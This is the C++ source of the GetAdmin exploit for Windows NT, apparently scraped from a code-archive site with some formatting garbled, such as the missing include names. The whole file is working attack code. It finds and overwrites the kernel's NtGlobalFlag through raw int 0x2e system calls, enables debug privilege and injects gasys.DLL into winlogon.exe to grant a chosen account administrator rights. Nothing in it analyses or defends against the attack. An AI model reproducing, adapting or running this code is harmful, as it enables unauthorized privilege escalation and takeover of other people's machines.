www.pudn.com > getadmin.zip > GetAdmin.cpp
#include#include #include #include #include "InjLib.h" DWORD PsGetProcessIdFromModuleName(LPCTSTR szName); #define PROCESSID_LOGON 32 #define PROCESS_MODNAMELOGON "winlogon.exe" char Account[255]; ////////////////////////////////////////////////////////////// #define NTOSKRNL_BASE 0x80100000 #define NTGLOBALFLAG_RELPTR 0x0007bc4c // sp3 // pNtGlobalGlag = NTOSKRNL_BASE + NTGLOBALFLAG_RELPTR // Change this function and you not need read access to ntoskrnl.exe . DWORD GetNtGlobalFlagPtr() { PIMAGE_NT_HEADERS nt_headers; PIMAGE_EXPORT_DIRECTORY export_data; DWORD export_data_size; PDWORD FunctionsNames,FunctionsPtrs; PWORD NameOrdinals; HANDLE hFile,hFileMap; DWORD file_len; PVOID mod_base,func_ptr=0,image_base; char file_path[MAX_PATH]; char * func_name; DWORD i; GetSystemDirectory(file_path,sizeof(file_path)); strcat(file_path,"\\ntoskrnl.exe"); hFile = CreateFile( file_path, // pointer to name of the file GENERIC_READ, // access (read-write) mode 0, // share mode 0, // pointer to security descriptor OPEN_EXISTING, // how to create 0, // file attributes 0// handle to file with attributes to copy ); if(hFile == INVALID_HANDLE_VALUE) return 0; file_len = GetFileSize(hFile,0); hFileMap = CreateFileMapping( hFile, // handle to file to map 0, // optional security attributes PAGE_READONLY, // protection for mapping object 0, // high-order 32 bits of object size 0, // low-order 32 bits of object size 0// name of file-mapping object ); mod_base = MapViewOfFile( hFileMap, // file-mapping object to map into address space FILE_MAP_READ, // access mode 0, // high-order 32 bits of file offset 0, // low-order 32 bits of file offset 0// number of bytes to map ); nt_headers = ImageNtHeader(mod_base); image_base = (PVOID)nt_headers->OptionalHeader.ImageBase; export_data = (PIMAGE_EXPORT_DIRECTORY) ImageDirectoryEntryToData( mod_base, FALSE, IMAGE_DIRECTORY_ENTRY_EXPORT, &export_data_size ); FunctionsNames = (PDWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfNames, 0); FunctionsPtrs = (PDWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfFunctions, 0); NameOrdinals = (PWORD)ImageRvaToVa( nt_headers, mod_base, (DWORD)export_data->AddressOfNameOrdinals, 0); for(i=0;i NumberOfFunctions;i++) { func_name = (PCHAR)(FunctionsNames[i]+(DWORD)mod_base); if(!strcmp(func_name,"NtGlobalFlag")) { func_ptr = (PVOID)FunctionsPtrs[NameOrdinals[i]]; } } UnmapViewOfFile(mod_base); CloseHandle(hFileMap); CloseHandle(hFile); if(!func_ptr) return 0; return (DWORD)image_base+(DWORD)func_ptr; } BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag) { DWORD callnumber = 0x3; DWORD stack[32] ; int i; DWORD handle=0; CHAR string[255]; if(!pNtGlobalFlag) return 0; stack[0] = (DWORD)string; stack[1] = (DWORD)&handle;//pNtGlobalFlag; for(i=0;i<0x100;i++) { sprintf(string,"NT now cracking... pass %d",i); if(handle & 0xf00){ stack[1] = (DWORD)pNtGlobalFlag+1; } __asm{ mov eax, callnumber; mov edx, stack; lea edx,dword ptr [stack] int 0x2e; } if( stack[1] == pNtGlobalFlag+1) break; } return TRUE; } BOOL AdjustPrivileges(LPCTSTR privilege) { HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // ptr. to token structure BOOL fResult; // system shutdown flag // // Get the current process token handle // so we can get debug privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) ; // Get the LUID for debug privilege. LookupPrivilegeValue(NULL, privilege, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get shutdown privilege for this process. fResult = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); return fResult; } HINSTANCE hInst; HWND hWnd; BOOL CALLBACK MyDlgProc( HWND hwndDlg, UINT uMsg,WPARAM wPara, LPARAM lParam ); BOOL AttachToProcess(DWORD ProcessId); BOOL DetachFromProcess(DWORD ProcessId); int main(int argc,char** argv) { DWORD AccountMaxLength = 255; DWORD ProcessId; if(!argv[1]) GetUserName(Account,&AccountMaxLength ); else strcpy(Account,argv[1]); ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); int ret = AdjustPrivileges(SE_DEBUG_NAME); // ret = AdjustPrivileges(SE_PROF_SINGLE_PROCESS_NAME); // ret = AdjustPrivileges(SE_SYSTEM_PROFILE_NAME); // ret = AdjustPrivileges(SE_TCB_NAME); if(!ret){ printf("Adjust privileges failed! Insufficient rights. \n"); return(-1); } ProcessId = PsGetProcessIdFromModuleName(PROCESS_MODNAMELOGON); if(ProcessId <=0) { printf("Can't determine winlogon process id. \n"); return(-1); } ret = AttachToProcess(ProcessId ); Sleep(500); DetachFromProcess(ProcessId ); if(ret) { printf("Congratulations , now account %s have administrator rights!",Account); } return(0); } int AttachToProcess(DWORD dwProcessId ) { HANDLE hProcess; if (dwProcessId == 0) { dwProcessId = GetCurrentProcessId(); } hProcess = OpenProcess(PROCESS_ALL_ACCESS,//PROCESS_QUERY_INFORMATION|PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessId); if (hProcess == NULL) { (GetLastError() == 5)? printf(__TEXT("Insufficient access rights.\n")) :printf(__TEXT("Invalid process Id\n")); return FALSE; } else { TCHAR szLibFile[MAX_PATH]; GetModuleFileName(hInst, szLibFile, sizeof(szLibFile)); _tcscpy(_tcsrchr(szLibFile, __TEXT('\\')) + 1, __TEXT("gasys.DLL")); if(InjectLib(hProcess, szLibFile) ){ // printf(__TEXT("Attach operation completed successfully.\n")); CloseHandle(hProcess); } else{ printf( __TEXT("Attach operation failed!\n")); CloseHandle(hProcess); return FALSE; } } return TRUE; } int DetachFromProcess(DWORD dwProcessId ) { HANDLE hProcess; if (dwProcessId == 0) { dwProcessId = GetCurrentProcessId(); } hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); if (hProcess == NULL) { (GetLastError() == 5)? printf(__TEXT("Insufficient access rights.\n")) :printf(__TEXT("Invalid process Id\n")); return FALSE; } else { TCHAR szLibFile[MAX_PATH]; GetModuleFileName(hInst, szLibFile, sizeof(szLibFile)); _tcscpy(_tcsrchr(szLibFile, __TEXT('\\')) + 1, __TEXT("gasys.DLL")); if(UnInjectLib(hProcess ,szLibFile)){ // printf(__TEXT("Detach operation completed successfully\n")); CloseHandle(hProcess); } else{ printf(__TEXT("Detach operation failed!\n")); CloseHandle(hProcess); return FALSE; } } return TRUE; }